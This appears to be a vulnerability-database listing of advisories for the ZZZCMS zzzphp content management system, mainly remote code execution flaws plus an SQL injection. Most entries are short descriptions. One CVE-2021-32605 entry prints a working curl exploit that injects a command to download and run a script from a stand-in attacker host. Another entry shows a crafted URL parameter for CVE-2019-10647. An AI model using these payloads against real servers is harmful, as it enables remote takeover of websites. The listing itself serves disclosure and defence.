ZZZCMS ZZZPHP 1.6.3 – Remote PHP Code Execution (RCE)

ZZZCMS zzzphp v1.6.3 contains a remote code execution caused by lack of restrictions in inc/zzzfile.php, letting attackers execute arbitrary PHP code via a crafted URL in the plugins/ueditor/php/controller.php?action=catchimage source parameter, exploit requires attacker to send malicious URL and...

ZZZCMS zzzphp 2.1.0 - Remote Code Execution

ZZZCMS zzzphp v2.1.0 is susceptible to a remote command execution vulnerability via dangerkey at zzztemplate.php. id: CVE-2022-23881 info: name: ZZZCMS zzzphp 2.1.0 - Remote Code Execution author: pikpikcu severity: critical description: ZZZCMS zzzphp v2.1.0 is susceptible to a remote command...

CVE-2022-23881

ZZZCMS zzzphp v2.1.0 was discovered to contain a remote command execution RCE vulnerability via dangerkey at zzztemplate.php...

EUVD-2019-7271

Malware in sbrugna...

EUVD-2019-7269

Malware in sbrugna...

EUVD-2020-17585

Malware in sbrugna...

EUVD-2019-2448

Malware in sbrugna...

EUVD-2020-13085

Malware in sbrugna...

CVE-2021-32605

zzzcms zzzphp before 2.0.4 allows remote attackers to execute arbitrary OS commands by placing them in the keys parameter of a ?location=search URI, as demonstrated by an OS command within an "if" "end if" block...

CVE-2020-24877

A SQL injection vulnerability in zzzphp v1.8.0 through /form/index.php?module=getjson may lead to a possible access restriction bypass...

CVE-2020-20298

Eval injection vulnerability in the parserCommom method in the ParserTemplate class in zzztemplate.php in zzzphp 1.7.2 allows remote attackers to execute arbitrary commands...

VulnCheck KEV: CVE-2019-10647

ZZZCMS zzzphp v1.6.3 allows remote attackers to execute arbitrary PHP code via a .php URL in the plugins/ueditor/php/controller.php?action=catchimage source parameter because of a lack of inc/zzzfile.php restrictions. For example, source%5B%5D=http%3A%2F%2F192.168.0.1%2Ftest.php can be used if...

CVE-2022-23881

ZZZCMS zzzphp v2.1.0 was discovered to contain a remote command execution RCE vulnerability via dangerkey at zzztemplate.php...

Command injection

ZZZCMS zzzphp v2.1.0 was discovered to contain a remote command execution RCE vulnerability via dangerkey at zzztemplate.php...

CVE-2022-23881

ZZZCMS zzzphp v2.1.0 was discovered to contain a remote command execution RCE vulnerability via dangerkey at zzztemplate.php...

CVE-2022-23881

ZZZCMS zzzphp 2.1.0 is affected by a remote code execution (RCE) vulnerability via danger_key() in zzz_template.php. Root cause: improper handling in danger_key() allows arbitrary code execution. Impact: attacker can execute code on affected systems (high/critical impact per sources). Exploitatio...

ZZZCMS zzzphp 安全漏洞

ZZZCMS zzzphp is a content management system CMS. A security vulnerability exists in ZZZCMS zzzphp version v2.1.0, which stems from incomplete filtering of user-entered parameters by the dangerkey function in zzztemplate.php...

zzzcms zzzphp parserIfLabel模板注入远程执行代码漏洞（CVE-2021-32605）

curl -b 'keys=if:=curl http://attacker.tld/poc.sh|bashend if' 'http://target.tld/?location=search'...

CVE-2021-32605

zzzcms zzzphp before 2.0.4 allows remote attackers to execute arbitrary OS commands by placing them in the keys parameter of a ?location=search URI, as demonstrated by an OS command within an "if" "end if" block...

CVE-2021-32605

zzzcms zzzphp before 2.0.4 allows remote attackers to execute arbitrary OS commands by placing them in the keys parameter of a ?location=search URI, as demonstrated by an OS command within an "if" "end if" block...